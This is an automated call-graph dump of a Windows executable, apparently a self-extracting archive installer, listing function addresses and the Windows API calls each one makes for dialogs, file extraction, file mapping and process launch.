d97695 22710 d976a0 22707->22710 22709 d976c9 22720 d976ed DeleteCriticalSection 22709->22720 22710->22709 22712 d976c5 22710->22712 22713 d979a7 22710->22713 22714 d97735 __dosmaperr 5 API calls 22713->22714 22715 d979ce 22714->22715 22716 d979ec InitializeCriticalSectionAndSpinCount 22715->22716 22717 d979d7 22715->22717 22716->22717 22718 d8d783 ___delayLoadHelper2@8 5 API calls 22717->22718 22719 d97a03 22718->22719 22719->22710 22720->22712 23828 d77a9b GetCurrentProcess GetLastError CloseHandle 22722 d71383 75 API calls 3 library calls 23761 d79481 72 API calls 23633 d8c782 23634 d8c730 23633->23634 23634->23633 23635 d8cabc ___delayLoadHelper2@8 19 API calls 23634->23635 23635->23634 23802 d89584 GetDlgItem EnableWindow ShowWindow SendMessageW 23867 d8e7b0 51 API calls 2 library calls 23868 d84fb5 119 API calls __vswprintf_c_l 23869 d8aa99 91 API calls 3 library calls 23833 d98aaa GetProcessHeap 23731 d710a9 23736 d75b35 23731->23736 23737 d75b3f __EH_prolog 23736->23737 23738 d7ac66 75 API calls 23737->23738 23739 d75b4b 23738->23739 23743 d75d2a GetCurrentProcess GetProcessAffinityMask 23739->23743 23871 d97ede 27 API calls ___delayLoadHelper2@8 21912 d8cd5c 21913 d8cd66 21912->21913 21916 d8cabc 21913->21916 21944 d8c7ca 21916->21944 21918 d8cad6 21919 d8cb33 21918->21919 21932 d8cb57 21918->21932 21955 d8ca3a 11 API calls 3 library calls 21919->21955 21921 d8cb3e RaiseException 21922 d8cd2c 21921->21922 21959 d8d783 21922->21959 21923 d8cbcf LoadLibraryExA 21925 d8cc30 21923->21925 21926 d8cbe2 GetLastError 21923->21926 21931 d8cc42 21925->21931 21933 d8cc3b FreeLibrary 21925->21933 21928 d8cc0b 21926->21928 21929 d8cbf5 21926->21929 21927 d8cd3b 21956 d8ca3a 11 API calls 3 library calls 21928->21956 21929->21925 21929->21928 21930 d8cca0 GetProcAddress 21935 d8ccb0 GetLastError 21930->21935 21940 d8ccfe 21930->21940 21931->21930 21931->21940 21932->21923 21932->21925 21932->21931 21932->21940 21933->21931 21937 d8ccc3 21935->21937 21936 d8cc16 RaiseException 21936->21922 21937->21940 21957 d8ca3a 11 API calls 3 library calls 21937->21957 21958 d8ca3a 11 API calls 3 library calls 21940->21958 21941 d8cce4 RaiseException 21942 d8c7ca ___delayLoadHelper2@8 11 API calls 21941->21942 21943 d8ccfb 21942->21943 21943->21940 21945 d8c7fc 21944->21945 21946 d8c7d6 21944->21946 21945->21918 21966 d8c878 8 API calls 2 library calls 21946->21966 21948 d8c7db 21949 d8c7f7 21948->21949 21967 d8c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 21948->21967 21968 d8c7fd GetModuleHandleW GetProcAddress GetProcAddress 21949->21968 21952 d8d783 ___delayLoadHelper2@8 5 API calls 21953 d8cab8 21952->21953 21953->21918 21954 d8ca87 21954->21952 21955->21921 21956->21936 21957->21941 21958->21922 21960 d8d78c 21959->21960 21961 d8d78e IsProcessorFeaturePresent 21959->21961 21960->21927 21963 d8ddb8 21961->21963 21969 d8dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21963->21969 21965 d8de9b 21965->21927 21966->21948 21967->21949 21968->21954 21969->21965 23804 d8995f 104 API calls 23805 d8955f 71 API calls 23770 d7605e 73 API calls 23806 d8d553 46 API calls 6 library calls 23872 d8d74a 28 API calls 2 library calls 22723 d89b4f 22724 d89b59 __EH_prolog 22723->22724 22883 d712e7 22724->22883 22727 d89b9b 22731 d89ba8 22727->22731 22732 d89c11 22727->22732 22759 d89b87 22727->22759 22728 d8a230 22956 d8b8bc 22728->22956 22736 d89bad 22731->22736 22737 d89be4 22731->22737 22735 d89cb0 GetDlgItemTextW 22732->22735 22741 d89c2b 22732->22741 22733 d8a25c 22739 d8a265 SendDlgItemMessageW 22733->22739 22740 d8a276 GetDlgItem SendMessageW 22733->22740 22734 d8a24e SendMessageW 22734->22733 22735->22737 22738 d89ce7 22735->22738 22742 d7d142 54 API calls 22736->22742 22736->22759 22743 d89c05 KiUserCallbackDispatcher 22737->22743 22737->22759 22745 d89cff GetDlgItem 22738->22745 22881 d89cf0 22738->22881 22739->22740 22974 d88b8e GetCurrentDirectoryW 22740->22974 22746 d7d142 54 API calls 22741->22746 22747 d89bc7 22742->22747 22743->22759 22749 d89d39 SetFocus 22745->22749 22750 d89d13 SendMessageW SendMessageW 22745->22750 22751 d89c4d SetDlgItemTextW 22746->22751 22996 d71227 SHGetMalloc 22747->22996 22748 d8a2a8 GetDlgItem 22754 d8a2c1 22748->22754 22755 d8a2c7 SetWindowTextW 22748->22755 22752 d89d49 22749->22752 22767 d89d55 22749->22767 22750->22749 22756 d89c5b 22751->22756 22757 d7d142 54 API calls 22752->22757 22754->22755 22975 d88fc8 GetClassNameW 22755->22975 22756->22759 22762 d89c68 GetMessageW 22756->22762 22774 d89c8e TranslateMessage DispatchMessageW 22756->22774 22786 d89d53 22757->22786 22758 d89bce 22758->22759 22764 d89bd2 SetDlgItemTextW 22758->22764 22760 d8a1d0 22765 d7d142 54 API calls 22760->22765 22762->22756 22762->22759 22764->22759 22768 d8a1e0 SetDlgItemTextW 22765->22768 22772 d7d142 54 API calls 22767->22772 22770 d8a1f4 22768->22770 22776 d7d142 54 API calls 22770->22776 22775 d89d87 22772->22775 22773 d89daa 22901 d79cce 22773->22901 22774->22756 22781 d73f5b _swprintf 51 API calls 22775->22781 22782 d8a21d 22776->22782 22778 d8aa45 91 API calls 22779 d8a312 22778->22779 22780 d8a342 22779->22780 22785 d7d142 54 API calls 22779->22785 22791 d8aa45 91 API calls 22780->22791 22821 d8a3fa 22780->22821 22781->22786 22783 d7d142 54 API calls 22782->22783 22783->22759 22790 d8a325 SetDlgItemTextW 22785->22790 22893 d8b70e GetDlgItem 22786->22893 22787 d8a4aa 22793 d8a4bc 22787->22793 22794 d8a4b3 EnableWindow 22787->22794 22788 d89ddf GetLastError 22789 d89de6 22788->22789 22907 d89023 SetCurrentDirectoryW 22789->22907 22796 d7d142 54 API calls 22790->22796 22792 d8a35d 22791->22792 22800 d8a36f 22792->22800 22822 d8a394 22792->22822 22797 d8a4d9 22793->22797 23005 d712a4 GetDlgItem EnableWindow 22793->23005 22794->22793 22799 d8a339 SetDlgItemTextW 22796->22799 22805 d8a500 22797->22805 22813 d8a4f8 SendMessageW 22797->22813 22798 d89dfc 22803 d89e05 GetLastError 22798->22803 22804 d89e0f 22798->22804 22799->22780 23003 d8859c 6 API calls 22800->23003 22801 d8a3ed 22806 d8aa45 91 API calls 22801->22806 22803->22804 22812 d89e8a 22804->22812 22816 d89e9a 22804->22816 22818 d89e27 GetTickCount 22804->22818 22805->22759 22809 d7d142 54 API calls 22805->22809 22806->22821 22808 d8a4cf 23006 d712a4 GetDlgItem EnableWindow 22808->23006 22815 d8a519 SetDlgItemTextW 22809->22815 22810 d8a388 22810->22822 22812->22816 22817 d8a0d3 22812->22817 22813->22805 22814 d8a488 23004 d8859c 6 API calls 22814->23004 22815->22759 22824 d8a06e 22816->22824 22825 d89eb2 GetModuleFileNameW 22816->22825 22916 d712c2 GetDlgItem ShowWindow 22817->22916 22819 d73f5b _swprintf 51 API calls 22818->22819 22826 d89e44 22819->22826 22821->22787 22821->22814 22828 d7d142 54 API calls 22821->22828 22822->22801 22829 d8aa45 91 API calls 22822->22829 22824->22737 22833 d7d142 54 API calls 22824->22833 22997 d7de7c 73 API calls 22825->22997 22908 d794f1 22826->22908 22827 d8a4a7 22827->22787 22828->22821 22834 d8a3c2 22829->22834 22830 d8a0e3 22917 d712c2 GetDlgItem ShowWindow 22830->22917 22832 d89edc 22837 d73f5b _swprintf 51 API calls 22832->22837 22838 d8a082 22833->22838 22834->22801 22839 d8a3cb DialogBoxParamW 22834->22839 22836 d8a0ed 22840 d7d142 54 API calls 22836->22840 22841 d89efe CreateFileMappingW 22837->22841 22843 d73f5b _swprintf 51 API calls 22838->22843 22839->22737 22839->22801 22844 d8a0f7 SetDlgItemTextW 22840->22844 22845 d89f60 GetCommandLineW 22841->22845 22877 d89fdd __vswprintf_c_l 22841->22877 22847 d8a0a0 22843->22847 22918 d712c2 GetDlgItem ShowWindow 22844->22918 22850 d89f71 22845->22850 22846 d89e6a 22851 d89e78 22846->22851 22852 d89e71 GetLastError 22846->22852 22859 d7d142 54 API calls 22847->22859 22848 d89fe8 ShellExecuteExW 22872 d8a005 22848->22872 22998 d897e4 SHGetMalloc 22850->22998 22855 d79437 72 API calls 22851->22855 22852->22851 22853 d8a10b SetDlgItemTextW GetDlgItem 22856 d8a13c 22853->22856 22857 d8a124 GetWindowLongW SetWindowLongW 22853->22857 22855->22812 22919 d8aa45 22856->22919 22857->22856 22858 d89f8d 22999 d897e4 SHGetMalloc 22858->22999 22859->22737 22863 d89f99 23000 d897e4 SHGetMalloc 22863->23000 22864 d8a048 22864->22824 22871 d8a05e UnmapViewOfFile CloseHandle 22864->22871 22865 d8aa45 91 API calls 22867 d8a158 22865->22867 22944 d8bc78 22867->22944 22868 d89fa5 23001 d7dfde 73 API calls ___scrt_get_show_window_mode 22868->23001 22871->22824 22872->22864 22875 d8a034 Sleep 22872->22875 22874 d89fbc MapViewOfFile 22874->22877 22875->22864 22875->22872 22877->22848 22881->22737 22881->22760 22884 d71349 22883->22884 22887 d712f0 22883->22887 23025 d7ceb0 GetWindowLongW SetWindowLongW 22884->23025 22886 d71356 22886->22727 22886->22728 22886->22759 22887->22886 23007 d7ced7 22887->23007 22890 d71325 GetDlgItem 22890->22886 22891 d71335 22890->22891 22891->22886 22892 d7133b SetWindowTextW 22891->22892 22892->22886 22894 d8b76a SendMessageW SendMessageW 22893->22894 22897 d8b73a 22893->22897 22895 d8b7c1 SendMessageW SendMessageW SendMessageW 22894->22895 22896 d8b7a2 22894->22896 22898 d8b80b SendMessageW 22895->22898 22899 d8b7ec SendMessageW 22895->22899 22896->22895 22900 d8b745 ShowWindow SendMessageW SendMessageW 22897->22900 22898->22773 22899->22898 22900->22894 22904 d79cd8 22901->22904 22902 d79d69 22903 d79e86 9 API calls 22902->22903 22905 d79d92 22902->22905 22903->22905 22904->22902 22904->22905 23029 d79e86 22904->23029 22905->22788 22905->22789 22907->22798 22909 d794fb 22908->22909 22910 d79565 CreateFileW 22909->22910 22911 d79559 22909->22911 22910->22911 22912 d795b7 22911->22912 22913 d7b275 2 API calls 22911->22913 22912->22846 22914 d7959e 22913->22914 22914->22912 22915 d795a2 CreateFileW 22914->22915 22915->22912 22916->22830 22917->22836 22918->22853 22920 d8aa4f __EH_prolog 22919->22920 22921 d8a14a 22920->22921 23061 d896ec 22920->23061 22921->22865 22924 d896ec ExpandEnvironmentStringsW 22929 d8aa86 _wcsrchr 22924->22929 22925 d8ad86 SetWindowTextW 22925->22929 22929->22921 22929->22924 22929->22925 22937 d8af50 GetDlgItem SetWindowTextW SendMessageW 22929->22937 22939 d8af92 SendMessageW 22929->22939 22941 d8ab6a ___scrt_get_show_window_mode 22929->22941 23065 d80b12 CompareStringW 22929->23065 23066 d88b8e GetCurrentDirectoryW 22929->23066 23067 d7a1a9 7 API calls 22929->23067 23070 d7a132 FindClose 22929->23070 23071 d89844 69 API calls ___std_exception_copy 22929->23071 23072 d920de 22929->23072 22931 d8ab77 SetFileAttributesW 22933 d8ac32 GetFileAttributesW 22931->22933 22931->22941 22935 d8ac40 DeleteFileW 22933->22935 22933->22941 22935->22941 22937->22929 22938 d73f5b _swprintf 51 API calls 22940 d8ac75 GetFileAttributesW 22938->22940 22939->22929 22940->22941 22942 d8ac86 MoveFileW 22940->22942 22941->22929 22941->22931 22941->22933 22941->22938 23068 d7b100 52 API calls 2 library calls 22941->23068 23069 d7a1a9 7 API calls 22941->23069 22942->22941 22943 d8ac9e MoveFileExW 22942->22943 22943->22941 22945 d8bc82 __EH_prolog 22944->22945 23087 d7f165 69 API calls 22945->23087 22947 d8bcb3 23088 d75bb7 69 API calls 22947->23088 22949 d8bcd1 23089 d77b10 74 API calls 2 library calls 22949->23089 22951 d8bd15 23090 d77c84 22951->23090 22953 d8bd24 23099 d77ba0 22953->23099 22957 d8b8c9 22956->22957 22958 d88ac0 6 API calls 22957->22958 22959 d8b8ce 22958->22959 22960 d8a236 22959->22960 22961 d8b8d6 GetWindow 22959->22961 22960->22733 22960->22734 22961->22960 22966 d8b8f2 22961->22966 22962 d8b8ff GetClassNameW 23616 d80b12 CompareStringW 22962->23616 22964 d8b988 GetWindow 22964->22960 22964->22966 22965 d8b927 GetWindowLongW 22965->22964 22967 d8b937 SendMessageW 22965->22967 22966->22960 22966->22962 22966->22964 22966->22965 22967->22964 22968 d8b94d GetObjectW 22967->22968 23617 d88b22 GetDC GetDeviceCaps ReleaseDC 22968->23617 22970 d8b962 23618 d88adf GetDC GetDeviceCaps ReleaseDC 22970->23618 23619 d88cf3 8 API calls ___scrt_get_show_window_mode 22970->23619 22973 d8b972 SendMessageW DeleteObject 22973->22964 22974->22748 22976 d88fe9 22975->22976 22977 d8900e 22975->22977 23620 d80b12 CompareStringW 22976->23620 22978 d8901c 22977->22978 22979 d89013 SHAutoComplete 22977->22979 22983 d89485 22978->22983 22979->22978 22981 d88ffc 22981->22977 22982 d89000 FindWindowExW 22981->22982 22982->22977 22984 d8948f __EH_prolog 22983->22984 22985 d7137e 75 API calls 22984->22985 22986 d894b1 22985->22986 23621 d71edd 22986->23621 22989 d894da 22992 d718f6 126 API calls 22989->22992 22990 d894cb 22991 d7162e 79 API calls 22990->22991 22993 d894d6 22991->22993 22995 d894fc __vswprintf_c_l ___std_exception_copy 22992->22995 22993->22778 22993->22779 22994 d7162e 79 API calls 22994->22993 22995->22994 22996->22758 22997->22832 22998->22858 22999->22863 23000->22868 23001->22874 23003->22810 23004->22827 23005->22808 23006->22797 23026 d7c88e 23007->23026 23009 d7cefd GetWindowRect GetClientRect 23010 d7cf57 23009->23010 23011 d7cff2 23009->23011 23012 d7d034 GetSystemMetrics GetWindow 23010->23012 23018 d7cfb8 GetWindowLongW 23010->23018 23011->23012 23013 d7cffc GetWindowTextW 23011->23013 23016 d7d054 23012->23016 23014 d7c91f 52 API calls 23013->23014 23017 d7d028 SetWindowTextW 23014->23017 23015 d71312 23015->22886 23015->22890 23016->23015 23019 d7d060 GetWindowTextW 23016->23019 23021 d7c91f 52 API calls 23016->23021 23022 d7d0a6 GetWindowRect 23016->23022 23023 d7d11b GetWindow 23016->23023 23017->23012 23020 d7cfe2 GetWindowRect 23018->23020 23019->23016 23020->23011 23024 d7d093 SetWindowTextW 23021->23024 23022->23023 23023->23015 23023->23016 23024->23016 23025->22886 23027 d7c91f 52 API calls 23026->23027 23028 d7c8b6 _wcschr 23027->23028 23028->23009 23030 d79e93 23029->23030 23031 d79eb7 23030->23031 23032 d79eaa CreateDirectoryW 23030->23032 23050 d79dff 23031->23050 23032->23031 23034 d79eea 23032->23034 23038 d79ef9 23034->23038 23042 d7a0c3 23034->23042 23036 d79efd GetLastError 23036->23038 23038->22904 23039 d7b275 2 API calls 23040 d79ed3 23039->23040 23040->23036 23041 d79ed7 CreateDirectoryW 23040->23041 23041->23034 23041->23036 23043 d8cec0 23042->23043 23044 d7a0d0 SetFileAttributesW 23043->23044 23045 d7a0e6 23044->23045 23046 d7a113 23044->23046 23047 d7b275 2 API calls 23045->23047 23046->23038 23048 d7a0fa 23047->23048 23048->23046 23049 d7a0fe SetFileAttributesW 23048->23049 23049->23046 23053 d79e13 23050->23053 23054 d8cec0 23053->23054 23055 d79e20 GetFileAttributesW 23054->23055 23056 d79e31 23055->23056 23057 d79e08 23055->23057 23058 d7b275 2 API calls 23056->23058 23057->23036 23057->23039 23059 d79e45 23058->23059 23059->23057 23060 d79e49 GetFileAttributesW 23059->23060 23060->23057 23062 d896f6 23061->23062 23063 d897a9 ExpandEnvironmentStringsW 23062->23063 23064 d897cc 23062->23064 23063->23064 23064->22929 23065->22929 23066->22929 23067->22929 23068->22941 23069->22941 23070->22929 23071->22929 23073 d95aea 23072->23073 23074 d95b02 23073->23074 23075 d95af7 23073->23075 23077 d95b0a 23074->23077 23083 d95b13 FindHandlerForForeignException 23074->23083 23076 d959fc __vswprintf_c_l 21 API calls 23075->23076 23081 d95aff 23076->23081 23078 d959c2 _free 20 API calls 23077->23078 23078->23081 23079 d95b18 23085 d95e3e 20 API calls __dosmaperr 23079->23085 23080 d95b3d RtlReAllocateHeap 23080->23081 23080->23083 23081->22929 23083->23079 23083->23080 23086 d946ca 7 API calls 2 library calls 23083->23086 23085->23081 23086->23083 23087->22947 23088->22949 23089->22951 23091 d77c8e 23090->23091 23093 d77cf8 23091->23093 23125 d7a145 23091->23125 23095 d77d62 23093->23095 23097 d7a145 8 API calls 23093->23097 23103 d7820b 23093->23103 23096 d77da4 23095->23096 23131 d76d0d 67 API calls 23095->23131 23096->22953 23097->23093 23100 d77bae 23099->23100 23102 d77bb5 23099->23102 23101 d80e21 79 API calls 23100->23101 23101->23102 23104 d78215 __EH_prolog 23103->23104 23132 d7137e 23104->23132 23106 d78230 23140 d79ba2 23106->23140 23111 d7825b 23113 d7825f 23111->23113 23122 d7a145 8 API calls 23111->23122 23123 d782fa 23111->23123 23264 d7b6cb CompareStringW 23111->23264 23260 d7162e 23113->23260 23117 d7835a 23163 d71e8e 23117->23163 23120 d78365 23120->23113 23167 d73a20 23120->23167 23177 d78409 23120->23177 23122->23111 23159 d783a3 23123->23159 23126 d7a15a 23125->23126 23130 d7a15e 23126->23130 23604 d7a273 23126->23604 23128 d7a16e 23129 d7a173 FindClose 23128->23129 23128->23130 23129->23130 23130->23091 23131->23096 23133 d71383 __EH_prolog 23132->23133 23266 d7c413 23133->23266 23135 d713ba 23139 d71413 ___scrt_get_show_window_mode 23135->23139 23272 d8cdae 23135->23272 23139->23106 23141 d79bad 23140->23141 23142 d78246 23141->23142 23297 d76e66 67 API calls 23141->23297 23142->23113 23144 d719b1 23142->23144 23145 d719bb __EH_prolog 23144->23145 23151 d719fd 23145->23151 23152 d719e4 23145->23152 23298 d7135c 23145->23298 23147 d71b16 23301 d76d0d 67 API calls 23147->23301 23149 d73a20 89 API calls 23153 d71b6d 23149->23153 23150 d71b26 23150->23149 23150->23152 23151->23147 23151->23150 23151->23152 23152->23111 23154 d71bb7 23153->23154 23156 d73a20 89 API calls 23153->23156 23154->23152 23158 d71bea 23154->23158 23302 d76d0d 67 API calls 23154->23302 23156->23153 23157 d73a20 89 API calls 23157->23158 23158->23152 23158->23157 23160 d783b0 23159->23160 23320 d7ffb8 GetSystemTime SystemTimeToFileTime 23160->23320 23162 d78314 23162->23117 23265 d806c8 65 API calls 23162->23265 23165 d71e93 __EH_prolog 23163->23165 23164 d71ec7 23164->23120 23165->23164 23322 d718f6 23165->23322 23168 d73a30 23167->23168 23169 d73a2c 23167->23169 23170 d73a4f 23168->23170 23171 d73a5d 23168->23171 23169->23120 23172 d73a8f 23170->23172 23539 d73203 76 API calls 3 library calls 23170->23539 23540 d7276c 89 API calls 3 library calls 23171->23540 23172->23120 23175 d73a5b 23175->23172 23541 d71fd2 67 API calls 23175->23541 23178 d78413 __EH_prolog 23177->23178 23179 d7844f 23178->23179 23209 d78453 23178->23209 23570 d877e7 92 API calls 23178->23570 23180 d78478 23179->23180 23183 d784ff 23179->23183 23179->23209 23182 d7849a 23180->23182 23180->23209 23571 d77a2f 150 API calls 23180->23571 23182->23209 23572 d877e7 92 API calls 23182->23572 23183->23209 23542 d75d98 23183->23542 23187 d7858c 23187->23209 23550 d780f8 23187->23550 23190 d786e9 23191 d7a145 8 API calls 23190->23191 23192 d7874d 23190->23192 23191->23192 23554 d77c11 23192->23554 23194 d7c57d 73 API calls 23197 d787a7 _memcmp 23194->23197 23195 d788d1 23196 d789a0 23195->23196 23203 d7891f 23195->23203 23201 d789fb 23196->23201 23214 d789ab 23196->23214 23197->23194 23197->23195 23198 d788ca 23197->23198 23197->23209 23573 d780a6 67 API calls 23197->23573 23574 d76d0d 67 API calls 23197->23574 23575 d76d0d 67 API calls 23198->23575 23212 d7898f 23201->23212 23578 d77f88 89 API calls 23201->23578 23202 d789f9 23205 d79437 72 API calls 23202->23205 23206 d79dff 4 API calls 23203->23206 23203->23212 23204 d78fb5 23207 d79437 72 API calls 23204->23207 23205->23209 23210 d78956 23206->23210 23207->23209 23209->23120 23210->23212 23576 d79161 89 API calls 23210->23576 23211 d78a64 23211->23204 23213 d7971a GetFileType 23211->23213 23224 d78acd 23211->23224 23212->23202 23212->23211 23216 d78aa5 23213->23216 23214->23202 23577 d77dc4 93 API calls __except_handler4 23214->23577 23215 d7a6a9 8 API calls 23218 d78b1c 23215->23218 23216->23224 23579 d71f18 67 API calls 23216->23579 23220 d7a6a9 8 API calls 23218->23220 23235 d78b32 23220->23235 23222 d78abb 23580 d76f67 68 API calls 23222->23580 23224->23215 23225 d78bd5 23226 d78d22 23225->23226 23227 d78c1e 23225->23227 23231 d78d34 23226->23231 23232 d78d48 23226->23232 23250 d78c4e 23226->23250 23228 d78c8e 23227->23228 23230 d78c2e 23227->23230 23229 d780f8 CharUpperW 23228->23229 23236 d78ca9 23229->23236 23237 d78c72 23230->23237 23242 d78c3c 23230->23242 23238 d790d0 119 API calls 23231->23238 23234 d81fa9 68 API calls 23232->23234 23239 d78d61 23234->23239 23235->23225 23560 d79869 23235->23560 23243 d78cd2 23236->23243 23244 d78cd9 23236->23244 23236->23250 23237->23250 23582 d777d4 101 API calls 23237->23582 23238->23250 23240 d81c40 119 API calls 23239->23240 23240->23250 23581 d71f18 67 API calls 23242->23581 23583 d77586 77 API calls __except_handler4 23243->23583 23584 d7900e 85 API calls __EH_prolog 23244->23584 23248 d78e6c 23248->23204 23249 d78edb 23248->23249 23586 d79b6a SetEndOfFile 23248->23586 23565 d79a12 23249->23565 23250->23248 23585 d71f18 67 API calls 23250->23585 23254 d78f35 23255 d794a3 68 API calls 23254->23255 23256 d78f40 23255->23256 23256->23204 23257 d7a0c3 4 API calls 23256->23257 23258 d78f9f 23257->23258 23258->23204 23587 d71f18 67 API calls 23258->23587 23261 d71640 23260->23261 23603 d7c4b6 79 API calls 23261->23603 23264->23111 23265->23117 23267 d7c41d __EH_prolog 23266->23267 23268 d8cdae new 8 API calls 23267->23268 23269 d7c460 23268->23269 23270 d8cdae new 8 API calls 23269->23270 23271 d7c484 23270->23271 23271->23135 23275 d8cdb3 ___std_exception_copy 23272->23275 23273 d71400 23273->23139 23278 d7ac66 23273->23278 23275->23273 23284 d946ca 7 API calls 2 library calls 23275->23284 23285 d8d83a RaiseException FindHandler new 23275->23285 23286 d8d81d RaiseException Concurrency::cancel_current_task FindHandler 23275->23286 23279 d7ac70 __EH_prolog 23278->23279 23287 d7ddc2 73 API calls 23279->23287 23281 d7ac82 23288 d7ad7e 23281->23288 23284->23275 23287->23281 23289 d7ad90 ___scrt_get_show_window_mode 23288->23289 23292 d7fce6 23289->23292 23295 d7fca6 GetCurrentProcess GetProcessAffinityMask 23292->23295 23296 d7acf8 23295->23296 23296->23139 23297->23142 23303 d71705 23298->23303 23300 d71378 23300->23151 23301->23152 23302->23158 23304 d7171b 23303->23304 23313 d71773 __vswprintf_c_l 23303->23313 23305 d71744 23304->23305 23316 d76dd3 67 API calls __vswprintf_c_l 23304->23316 23307 d7179a 23305->23307 23312 d71760 ___std_exception_copy 23305->23312 23309 d920de 22 API calls 23307->23309 23308 d7173a 23317 d76e0b 68 API calls 23308->23317 23311 d717a1 23309->23311 23311->23313 23319 d76e0b 68 API calls 23311->23319 23312->23313 23318 d76e0b 68 API calls 23312->23318 23313->23300 23316->23308 23317->23305 23318->23313 23319->23313 23321 d7ffe8 __vswprintf_c_l 23320->23321 23321->23162 23323 d718fb __EH_prolog 23322->23323 23324 d71934 23323->23324 23326 d71964 23323->23326 23327 d7190f 23323->23327 23325 d73a20 89 API calls 23324->23325 23325->23327 23331 d73e69 23326->23331 23327->23164 23332 d73e72 23331->23332 23333 d73a20 89 API calls 23332->23333 23335 d71980 23332->23335 23348 d7f8f2 23332->23348 23333->23332 23335->23327 23336 d71da1 23335->23336 23337 d71dab __EH_prolog 23336->23337 23356 d73aa3 23337->23356 23339 d71dd4 23340 d71705 69 API calls 23339->23340 23347 d71e5b 23339->23347 23341 d71deb 23340->23341 23386 d7187c 69 API calls 23341->23386 23343 d71e03 23345 d71e0f 23343->23345 23387 d806e9 MultiByteToWideChar 23343->23387 23388 d7187c 69 API calls 23345->23388 23347->23327 23349 d7f8f9 23348->23349 23350 d7f914 23349->23350 23354 d76dce RaiseException FindHandler 23349->23354 23352 d7f925 SetThreadExecutionState 23350->23352 23355 d76dce RaiseException FindHandler 23350->23355 23352->23332 23354->23350 23355->23352 23357 d73aad __EH_prolog 23356->23357 23358 d73ac3 23357->23358 23359 d73adf 23357->23359 23425 d76d0d 67 API calls 23358->23425 23361 d73d1f 23359->23361 23364 d73b0b 23359->23364 23444 d76d0d 67 API calls 23361->23444 23363 d73ace 23363->23339 23364->23363 23389 d80be0 23364->23389 23366 d73b43 23393 d81fa9 23366->23393 23368 d73b8c 23369 d73c17 23368->23369 23385 d73b83 23368->23385 23428 d7c57d 23368->23428 23406 d7a6a9 23369->23406 23370 d73b88 23370->23368 23427 d71fb8 69 API calls 23370->23427 23372 d73b5a 23372->23368 23372->23370 23373 d73b78 23372->23373 23426 d76d0d 67 API calls 23373->23426 23376 d73c2a 23379 d73ca5 23376->23379 23380 d73c9b 23376->23380 23434 d81c40 23379->23434 23410 d790d0 23380->23410 23383 d73ca3 23383->23385 23443 d71f18 67 API calls 23383->23443 23421 d80e21 23385->23421 23386->23343 23387->23345 23388->23347 23390 d80bea __EH_prolog 23389->23390 23445 d7fb02 23390->23445 23392 d80cea 23392->23366 23394 d81fb8 23393->23394 23396 d81fc2 23393->23396 23464 d76e0b 68 API calls 23394->23464 23397 d82002 23396->23397 23398 d82007 ___std_exception_copy 23396->23398 23403 d82060 ___scrt_get_show_window_mode 23396->23403 23466 d900ca RaiseException 23397->23466 23399 d82117 23398->23399 23401 d8203c 23398->23401 23398->23403 23467 d900ca RaiseException 23399->23467 23465 d81eca 68 API calls 3 library calls 23401->23465 23403->23372 23404 d8213a 23407 d7a6b6 23406->23407 23409 d7a6c0 23406->23409 23408 d8cdae new 8 API calls 23407->23408 23408->23409 23409->23376 23411 d790da __EH_prolog 23410->23411 23468 d77c6b 23411->23468 23414 d7135c 69 API calls 23415 d790ec 23414->23415 23471 d7c658 23415->23471 23417 d79146 23417->23383 23419 d7c658 114 API calls 23420 d790fe 23419->23420 23420->23417 23420->23419 23480 d7c810 91 API calls __vswprintf_c_l 23420->23480 23422 d80e43 23421->23422 23487 d7fc30 23422->23487 23424 d80e5c 23424->23363 23425->23363 23426->23385 23427->23368 23429 d7c5b0 23428->23429 23430 d7c59e 23428->23430 23504 d76195 73 API calls 23429->23504 23503 d76195 73 API calls 23430->23503 23433 d7c5a8 23433->23369 23435 d81c49 23434->23435 23436 d81c72 23434->23436 23437 d81c66 23435->23437 23439 d81c68 23435->23439 23440 d81c5e 23435->23440 23436->23437 23519 d8421d 119 API calls 2 library calls 23436->23519 23437->23383 23518 d84f35 114 API calls 23439->23518 23505 d85984 23440->23505 23443->23385 23444->23363 23461 d8cdf0 23445->23461 23447 d7fb0c EnterCriticalSection 23448 d7fb30 23447->23448 23458 d7fb4e 23447->23458 23451 d8cdae new 8 API calls 23448->23451 23449 d7fb66 23452 d8cdae new 8 API calls 23449->23452 23450 d7fb95 LeaveCriticalSection 23453 d7fba1 23450->23453 23454 d7fb3a 23451->23454 23455 d7fb70 23452->23455 23453->23392 23454->23458 23462 d7f930 71 API calls 23454->23462 23456 d7fb8a LeaveCriticalSection 23455->23456 23463 d7f930 71 API calls 23455->23463 23456->23453 23458->23449 23458->23450 23460 d7fb88 23460->23456 23461->23447 23462->23458 23463->23460 23464->23396 23465->23403 23466->23399 23467->23404 23469 d7a8e0 GetVersionExW 23468->23469 23470 d77c70 23469->23470 23470->23414 23476 d7c66d __vswprintf_c_l 23471->23476 23472 d7c7b7 23473 d7c7df 23472->23473 23481 d7c5f7 23472->23481 23475 d7f8f2 2 API calls 23473->23475 23478 d7c7ae 23475->23478 23476->23472 23476->23478 23485 d7a791 85 API calls 23476->23485 23486 d877e7 92 API calls 23476->23486 23478->23420 23480->23420 23482 d7c600 23481->23482 23484 d7c651 23481->23484 23483 d80680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23482->23483 23482->23484 23483->23484 23484->23473 23485->23476 23486->23476 23488 d7fca2 23487->23488 23489 d7fc39 EnterCriticalSection 23487->23489 23488->23424 23493 d7fc57 23489->23493 23495 d7fc75 23489->23495 23490 d7f9d1 77 API calls 23492 d7fc8f 23490->23492 23491 d7fc98 LeaveCriticalSection 23491->23488 23492->23491 23493->23495 23496 d7f9d1 23493->23496 23495->23490 23495->23491 23497 d7fdc9 72 API calls 23496->23497 23498 d7f9f3 ReleaseSemaphore 23497->23498 23499 d7fa13 23498->23499 23500 d7fa31 DeleteCriticalSection CloseHandle CloseHandle 23498->23500 23501 d7fac7 70 API calls 23499->23501 23500->23495 23502 d7fa1d CloseHandle 23501->23502 23502->23499 23502->23500 23503->23433 23504->23433 23520 d821e6 23505->23520 23507 d7c658 114 API calls 23515 d85995 ___BuildCatchObject __vswprintf_c_l 23507->23515 23508 d85d67 23538 d83ef1 92 API calls __vswprintf_c_l 23508->23538 23510 d85d77 __vswprintf_c_l 23510->23437 23515->23507 23515->23508 23524 d7fa67 23515->23524 23530 d82b3a 114 API calls 23515->23530 23531 d85db9 114 API calls 23515->23531 23532 d7fdc9 23515->23532 23536 d82593 92 API calls 